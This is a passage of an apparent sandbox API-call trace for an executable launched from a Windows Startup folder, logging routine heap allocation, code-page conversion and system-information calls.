	[0169.580] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4396b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x0, Size=0xe6) returned 0x79e2ad0
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x98) returned 0x79e09b8
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x3e) returned 0x79e2bc0
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x6c) returned 0x79e2c08
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x6e) returned 0x79e2c80
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x78) returned 0x79e2cf8
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x62) returned 0x79e2d78
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x2e) returned 0x79e2de8
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x48) returned 0x79e2e20
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x28) returned 0x79e2e70
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x1a) returned 0x79e1858
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x4a) returned 0x79e2ea0
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x72) returned 0x79e4098
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x30) returned 0x79e2ef8
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x2e) returned 0x79e2f30
	[0169.580] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x1c) returned 0x79e1880
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0xd2) returned 0x79e2f68
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x7c) returned 0x79e3048
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x36) returned 0x79e30d0
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x3a) returned 0x79e3110
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x90) returned 0x79e3158
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x24) returned 0x79e31f0
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x30) returned 0x79e3220
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x36) returned 0x79e3258
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x48) returned 0x79e3298
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x52) returned 0x79e32e8
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x3c) returned 0x79e3348
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x82) returned 0x79e3390
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x2e) returned 0x79e3420
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x1e) returned 0x79e18a8
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x2c) returned 0x79e3458
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x54) returned 0x79e3490
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x52) returned 0x79e34f0
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x2a) returned 0x79e3550
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x3c) returned 0x79e6080
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x54) returned 0x79e60c8
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x24) returned 0x79e6128
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x30) returned 0x79e6158
	[0169.581] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x8c) returned 0x79e6190
	[0169.581] HeapFree (in: hHeap=0x79d0000, dwFlags=0x0, lpMem=0x79e35a8 | out: hHeap=0x79d0000) returned 1
	[0169.582] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x80) returned 0x79e3588
	[0169.582] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0169.582] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x8, Size=0x800) returned 0x79e3610
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] GetACP () returned 0x4e4
	[0169.582] RtlAllocateHeap (HeapHandle=0x79d0000, Flags=0x0, Size=0x220) returned 0x79e3e18
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] IsValidCodePage (CodePage=0x4e4) returned 1
	[0169.582] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1
	[0169.582] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0169.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0169.582] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1
	[0169.582] GetLastError () returned 0x0
	[0169.582] SetLastError (dwErrCode=0x0) 
	[0169.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0169.582] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0169.583] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0169.583] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0169.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿû\x12Óëäþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0169.583] GetLastError () returned 0x0
	[0169.583] SetLastError (dwErrCode=0x0) 
	[0169.583] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0169.583] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0169.583] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0169.583] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0169.583] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿû\x12Óëäþ\x18", lpUsedDefaultChar=0x0) returned 256
	[0169.583] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4050f2) returned 0x0
	[0169.583] RtlSizeHeap (HeapHandle=0x79d0000, Flags=0x0, MemoryPointer=0x79e3588) returned 0x80
	[0169.583] RtlSizeHeap (HeapHandle=0x79d0000, Flags=0x0, MemoryPointer=0x79e3588) returned 0x80
	[0169.584] RtlSizeHeap (HeapHandle=0x79d0000, Flags=0x0, MemoryPointer=0x79e3588) returned 0x80
	[0169.584] RtlSizeHeap (HeapHandle=0x79d0000, Flags=0x0, MemoryPointer=0x79e3588) returned 0x80
	[0169.584] lstrlenW (lpString="") returned 0
	[0169.584] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.584] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.584] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0169.585] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
